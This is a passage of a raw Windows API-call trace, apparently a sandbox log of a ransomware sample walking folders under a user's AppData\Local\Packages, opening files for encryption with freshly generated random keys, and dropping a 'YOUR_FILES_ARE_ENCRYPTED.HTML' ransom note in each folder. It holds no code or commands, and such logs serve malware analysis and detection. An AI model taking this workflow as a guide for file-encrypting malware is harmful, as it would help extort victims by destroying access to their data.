ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.795] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.795] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat") returned 112 [0115.795] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.795] lstrlenW (lpString=".dat") returned 4 [0115.795] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.795] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0115.796] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.796] GetProcessHeap () returned 0x600000 [0115.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.799] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="8B") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="56") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8C") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="23") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B5") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="12") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="22") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C5") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="6D") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FB") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="AE") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="3F") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="65") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F5") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="CE") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4B") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="6C") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8A") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="06") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="90") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BD") returned 2 [0115.799] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BE") returned 2 [0115.799] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="2D") returned 2 [0115.799] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C4") returned 2 [0115.799] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="2E") returned 2 [0115.799] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C7") returned 2 [0115.799] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B5") returned 2 [0115.799] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="FE") returned 2 [0115.800] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B5") returned 2 [0115.800] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="AE") returned 2 [0115.800] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="16") returned 2 [0115.800] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="35") returned 2 [0115.800] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.800] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.800] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.800] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.800] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.800] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.800] GetProcessHeap () returned 0x600000 [0115.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.802] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.803] CloseHandle (hObject=0x32c) returned 1 [0115.803] GetProcessHeap () returned 0x600000 [0115.803] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.803] GetProcessHeap () returned 0x600000 [0115.803] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.803] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x92a08d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.803] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.803] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData") returned 104 [0115.804] GetProcessHeap () returned 0x600000 [0115.804] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.804] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData" [0115.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData\\*" [0115.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x92a08d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.804] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x92a08d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.804] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x92a08d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.804] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.805] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0115.805] GetProcessHeap () returned 0x600000 [0115.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.805] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.807] CloseHandle (hObject=0x32c) returned 1 [0115.807] GetProcessHeap () returned 0x600000 [0115.807] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.807] GetProcessHeap () returned 0x600000 [0115.807] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.807] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.807] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.807] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState") returned 100 [0115.807] GetProcessHeap () returned 0x600000 [0115.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.807] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState" [0115.807] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState\\*" [0115.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.807] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.808] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.808] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.808] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0115.808] GetProcessHeap () returned 0x600000 [0115.808] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.809] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.810] CloseHandle (hObject=0x32c) returned 1 [0115.810] GetProcessHeap () returned 0x600000 [0115.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.810] GetProcessHeap () returned 0x600000 [0115.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.810] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.810] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.810] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0115.810] GetProcessHeap () returned 0x600000 [0115.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.831] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.832] CloseHandle (hObject=0x214) returned 1 [0115.833] GetProcessHeap () returned 0x600000 [0115.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.833] GetProcessHeap () returned 0x600000 [0115.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.834] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Getstarted_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.GET")) returned 1 [0115.834] StrStrIW (lpFirst="Microsoft.Getstarted_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.834] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe") returned 83 [0115.834] GetProcessHeap () returned 0x600000 [0115.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.836] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe" [0115.836] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\*" [0115.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0115.838] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262593e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.838] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.838] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.838] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC") returned 86 [0115.838] GetProcessHeap () returned 0x600000 [0115.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.839] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC" [0115.839] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\*" [0115.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, 